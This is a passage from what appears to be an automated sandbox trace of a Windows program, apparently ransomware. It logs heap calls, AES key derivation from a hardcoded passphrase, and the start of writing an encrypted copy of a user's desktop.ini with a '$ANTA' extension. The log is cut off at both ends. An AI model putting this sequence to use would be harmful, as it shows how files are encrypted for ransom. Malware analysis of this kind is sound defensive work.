dwFlags=0x0, lpMem=0x43ca208 | out: hHeap=0x1780000) returned 1 [0087.509] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4369fd8 | out: hHeap=0x1780000) returned 1 [0087.509] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2670 | out: hHeap=0x1780000) returned 1 [0087.509] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca250 | out: hHeap=0x1780000) returned 1 [0087.509] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca268 | out: hHeap=0x1780000) returned 1 [0087.509] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca298 | out: hHeap=0x1780000) returned 1 [0087.509] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca748 | out: hHeap=0x1780000) returned 1 [0087.510] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca538 | out: hHeap=0x1780000) returned 1 [0087.510] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca580 | out: hHeap=0x1780000) returned 1 [0087.510] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca508 | out: hHeap=0x1780000) returned 1 [0087.510] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca550 | out: hHeap=0x1780000) returned 1 [0087.510] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfae0 | out: hHeap=0x1780000) returned 1 [0087.510] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e93c8 | out: hHeap=0x1780000) returned 1 [0087.510] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25e0 | out: hHeap=0x1780000) returned 1 [0087.510] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9f08 | out: hHeap=0x1780000) returned 1 [0087.510] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca0d0 | out: hHeap=0x1780000) returned 1 [0087.510] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2480 | out: hHeap=0x1780000) returned 1 [0087.510] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfb80 | out: hHeap=0x1780000) returned 1 [0087.510] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9e78 | out: hHeap=0x1780000) returned 1 [0087.510] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2290 | out: hHeap=0x1780000) returned 1 [0087.510] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2130 | out: hHeap=0x1780000) returned 1 [0087.510] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0087.510] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CloseHandle", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0087.510] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CloseHandle", cchWideChar=12, lpMultiByteStr=0x43c9ba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CloseHandle", lpUsedDefaultChar=0x0) returned 12 [0087.510] CloseHandle (hObject=0x258) returned 1 [0087.511] FreeLibrary (hLibModule=0x772d0000) returned 1 [0087.511] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTFILE", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTFILE") returned 0x12 [0087.511] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Pictures\\desktop.ini", lpFindFileData=0x144ed28 | out: lpFindFileData=0x144ed28*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x44053085, ftCreationTime.dwHighDateTime=0x1d32722, ftLastAccessTime.dwLowDateTime=0x44053085, ftLastAccessTime.dwHighDateTime=0x1d32722, ftLastWriteTime.dwLowDateTime=0xce2f1526, ftLastWriteTime.dwHighDateTime=0x1d32743, nFileSizeHigh=0x0, nFileSizeLow=0x1f8, dwReserved0=0x43c34c0, dwReserved1=0x8, cFileName="desktop.ini", cAlternateFileName="")) returned 0x41ac2c0 [0087.511] FindClose (in: hFindFile=0x41ac2c0 | out: hFindFile=0x41ac2c0) returned 1 [0087.511] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0087.511] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0087.511] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLESET", cchLength=0x14 | out: lpsz="__CRYPT_DLLHANDLESET") returned 0x14 [0087.511] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0087.511] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0087.511] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0087.511] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x1796e88, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContext", lpUsedDefaultChar=0x0) returned 20 [0087.511] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0087.511] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x1796ea8, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContextA", lpUsedDefaultChar=0x0) returned 21 [0087.511] CryptAcquireContextA (in: phProv=0x144ea08, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x144ea08*=0x41a5250) returned 1 [0087.512] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXTSET", cchLength=0x12 | out: lpsz="__CRYPT_CONTEXTSET") returned 0x12 [0087.512] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0087.512] CharUpperBuffW (in: lpsz="_CRYPT_DERIVEKEY", cchLength=0x10 | out: lpsz="_CRYPT_DERIVEKEY") returned 0x10 [0087.512] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0087.512] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0087.512] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0087.550] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0087.551] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0087.551] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0087.551] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptCreateHash", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0087.551] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptCreateHash", cchWideChar=16, lpMultiByteStr=0x43ca4c0, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptCreateHash", lpUsedDefaultChar=0x0) returned 16 [0087.551] CryptCreateHash (in: hProv=0x41a5250, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x144e778 | out: phHash=0x144e778) returned 1 [0087.551] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="mimniasnfiwentientienternyeirynery", cchWideChar=35, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 35 [0087.551] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="mimniasnfiwentientienternyeirynery", cchWideChar=35, lpMultiByteStr=0x17e2848, cbMultiByte=35, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="mimniasnfiwentientienternyeirynery", lpUsedDefaultChar=0x0) returned 35 [0087.551] CharLowerBuffW (in: lpsz="byte[34]", cchLength=0x8 | out: lpsz="byte[34]") returned 0x8 [0087.551] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="mimniasnfiwentientienternyeirynery", cchWideChar=35, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 35 [0087.551] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="mimniasnfiwentientienternyeirynery", cchWideChar=35, lpMultiByteStr=0x17e28a8, cbMultiByte=35, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="mimniasnfiwentientienternyeirynery", lpUsedDefaultChar=0x0) returned 35 [0087.551] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0087.551] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0087.551] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptHashData", cchWideChar=14, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0087.551] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptHashData", cchWideChar=14, lpMultiByteStr=0x43ca4d8, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptHashData", lpUsedDefaultChar=0x0) returned 14 [0087.551] CryptHashData (hHash=0x41ac640, pbData=0x17e2b18, dwDataLen=0x22, dwFlags=0x1) returned 1 [0087.551] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0087.551] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0087.551] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0087.551] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDeriveKey", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0087.551] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDeriveKey", cchWideChar=15, lpMultiByteStr=0x43ca6b8, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDeriveKey", lpUsedDefaultChar=0x0) returned 15 [0087.552] CryptDeriveKey (in: hProv=0x41a5250, Algid=0x6610, hBaseData=0x41ac640, dwFlags=0x1, phKey=0x144e778 | out: phKey=0x144e778*=0x41ac2c0) returned 1 [0087.552] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0087.552] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0087.552] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0087.552] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x1796e08, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDestroyHash", lpUsedDefaultChar=0x0) returned 17 [0087.552] CryptDestroyHash (hHash=0x41ac640) returned 1 [0087.552] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2590 [0087.552] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x214) returned 0x43e9c68 [0087.552] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25d0 [0087.552] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cabb0 [0087.552] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cac40 [0087.552] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caaa8 [0087.552] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26c0 [0087.552] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cac70 [0087.552] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cace8 [0087.552] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cac88 [0087.552] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2680 [0087.552] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26c0 [0087.552] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cffb8 [0087.552] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca850 [0087.552] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2650 [0087.552] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca928 [0087.552] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2660 [0087.552] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa48 [0087.553] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2620 [0087.553] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e24e0 [0087.553] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20a) returned 0x43eada8 [0087.553] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2480 [0087.553] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac200 [0087.553] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0087.553] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac200 | out: hHeap=0x1780000) returned 1 [0087.553] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0087.553] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac140 | out: hHeap=0x1780000) returned 1 [0087.553] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0087.553] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2480 [0087.553] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfa18 [0087.553] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9bd8 [0087.553] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e23a0 [0087.553] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca430 [0087.553] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e23a0 | out: hHeap=0x1780000) returned 1 [0087.553] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca3a0 [0087.553] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e23a0 [0087.553] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e23a0 | out: hHeap=0x1780000) returned 1 [0087.553] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac200 [0087.553] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10000) returned 0x43ed3b0 [0087.553] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca2e0 [0087.553] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e23a0 [0087.553] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Pictures\\desktop.ini" (normalized: "c:\\users\\fd1hvy\\pictures\\desktop.ini"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x258 [0087.554] SetFilePointerEx (in: hFile=0x258, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0087.554] SetFilePointerEx (in: hFile=0x258, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x144eeb0 | out: lpNewFilePointer=0x0) returned 1 [0087.554] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf9a0 [0087.554] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca238 [0087.554] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2490 [0087.554] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca430 | out: hHeap=0x1780000) returned 1 [0087.554] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9bd8 | out: hHeap=0x1780000) returned 1 [0087.554] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca3a0 | out: hHeap=0x1780000) returned 1 [0087.554] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfa18 | out: hHeap=0x1780000) returned 1 [0087.554] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2480 | out: hHeap=0x1780000) returned 1 [0087.554] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0087.554] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e24b0 [0087.554] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e24e0 [0087.554] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2480 [0087.554] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1797108 [0087.554] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2480 | out: hHeap=0x1780000) returned 1 [0087.554] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1797108 | out: hHeap=0x1780000) returned 1 [0087.554] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24e0 | out: hHeap=0x1780000) returned 1 [0087.554] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24b0 | out: hHeap=0x1780000) returned 1 [0087.554] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac140 [0087.554] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0087.554] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac140 | out: hHeap=0x1780000) returned 1 [0087.554] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0087.554] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2480 [0087.555] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfa90 [0087.555] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca3a0 [0087.555] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2330 [0087.555] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca1a8 [0087.555] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2330 | out: hHeap=0x1780000) returned 1 [0087.555] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca298 [0087.555] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e24a0 [0087.555] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e24b0 [0087.555] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1797108 [0087.555] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1797108 | out: hHeap=0x1780000) returned 1 [0087.555] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24b0 | out: hHeap=0x1780000) returned 1 [0087.555] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24a0 | out: hHeap=0x1780000) returned 1 [0087.555] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca1d8 [0087.555] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e24a0 [0087.555] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca358 [0087.555] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e24b0 [0087.555] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca2b0 [0087.555] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e24e0 [0087.555] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca2f8 [0087.555] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e24f0 [0087.555] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca310 [0087.555] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2510 [0087.555] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca370 [0087.555] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2520 [0087.555] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca310 | out: hHeap=0x1780000) returned 1 [0087.556] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4391bd0 [0087.556] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2330 [0087.556] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x60) returned 0x43597f8 [0087.556] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca2f8 | out: hHeap=0x1780000) returned 1 [0087.556] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4391e70 [0087.556] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca358 | out: hHeap=0x1780000) returned 1 [0087.556] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4391f50 [0087.556] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43597f8 | out: hHeap=0x1780000) returned 1 [0087.556] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2330 | out: hHeap=0x1780000) returned 1 [0087.556] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca370 | out: hHeap=0x1780000) returned 1 [0087.556] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2520 | out: hHeap=0x1780000) returned 1 [0087.556] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4391bd0 | out: hHeap=0x1780000) returned 1 [0087.556] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2510 | out: hHeap=0x1780000) returned 1 [0087.556] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4391e70 | out: hHeap=0x1780000) returned 1 [0087.556] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24f0 | out: hHeap=0x1780000) returned 1 [0087.556] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca2b0 | out: hHeap=0x1780000) returned 1 [0087.556] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24e0 | out: hHeap=0x1780000) returned 1 [0087.556] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e24e0 [0087.556] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8f48 [0087.556] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Pictures\\" (normalized: "c:\\users\\fd1hvy\\pictures")) returned 0x11 [0087.556] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a8f48 | out: hHeap=0x1780000) returned 1 [0087.556] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24e0 | out: hHeap=0x1780000) returned 1 [0087.556] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4391f50 | out: hHeap=0x1780000) returned 1 [0087.556] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24b0 | out: hHeap=0x1780000) returned 1 [0087.557] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca1d8 | out: hHeap=0x1780000) returned 1 [0087.557] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24a0 | out: hHeap=0x1780000) returned 1 [0087.557] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac740 [0087.557] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10000) returned 0x4506008 [0087.557] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca478 [0087.557] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2510 [0087.557] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Pictures\\desktop.ini.$ANTA" (normalized: "c:\\users\\fd1hvy\\pictures\\desktop.ini.$anta"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x298 [0087.557] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf9c8 [0087.557] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca3e8 [0087.557] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e24a0 [0087.557] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca1a8 | out: hHeap=0x1780000) returned 1 [0087.557] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca3a0 | out: hHeap=0x1780000) returned 1 [0087.557] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca298 | 